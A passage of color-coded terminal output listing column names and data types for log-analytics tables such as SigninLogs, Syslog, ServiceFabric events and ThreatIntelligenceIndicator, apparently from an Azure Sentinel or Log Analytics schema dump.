\u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShareLocalPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShareName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidHistory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StorageAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Subject\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectKeyIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectMachineSID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TableId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLinkedLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetServerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUser\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Task\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateContent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateDSObjectFQDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateInternalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateOID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateSchemaVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TokenElevationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TransmittedServices\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAccountControl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserWorkstations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorIds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VirtualAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Workstation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkstationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricOperationalEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UpgradeDomains\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricReliableActorEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ActorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActorIdKind\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ActorType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CountOfWaitingMethodCalls\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Exception\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsStateful\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MethodExecutionTimeTicks\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"MethodName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MethodSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NodeId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaOrInstanceId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SaveStateExecutionTimeTicks\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ServiceFabricReliableServiceEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"ActualCancellationTimeMillis\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ChannelName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventId\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Exception\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"KeywordName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OpcodeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PartitionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Pid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ReplicaId\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Role\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SlowCancellationTimeMillis\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TaskName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Tid\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WasCanceled\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SigninLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AADTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AppId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientAppUsed\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConditionalAccessPolicies\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"ConditionalAccessStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDetail\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Id\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsRisky\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LocationDetails\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OriginalRequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskDetail\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskEventTypes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskLevelAggregated\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskLevelDuringSignIn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RiskState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Syslog\"\u001b[39;49;00m: {\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Facility\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SeverityLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SyslogMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ThreatIntelligenceIndicator\"\u001b[39;49;00m: {\n        \u001b[94m\"Action\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Active\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityGroupNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceScore\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DiamondModel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailEncoding\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailLanguage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailRecipient\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSenderAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSenderName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSourceDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSourceIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailSubject\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EmailXMailer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExpirationDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ExternalIndicatorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileCompileDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"FileCreatedDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"FileHashType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHashValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileMutexName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePacker\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileSize\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"FileType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainActions\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainC2\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainDelivery\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainExploitation\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainReconnaissance\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KillChainWeaponization\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"KnownFalsePositives\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MalwareNames\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationAsn\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkDestinationPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkPort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkProtocol\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceAsn\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceCidrBlock\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkSourcePort\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"PassiveOnly\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Tags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatSeverity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TrafficLightProtocolLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"Usage\"\u001b[39;49;00m: {\n        \u001b[94m\"AvgLatencyInSeconds\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesCapped\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesOutsideSla\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"BatchesWithinSla\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        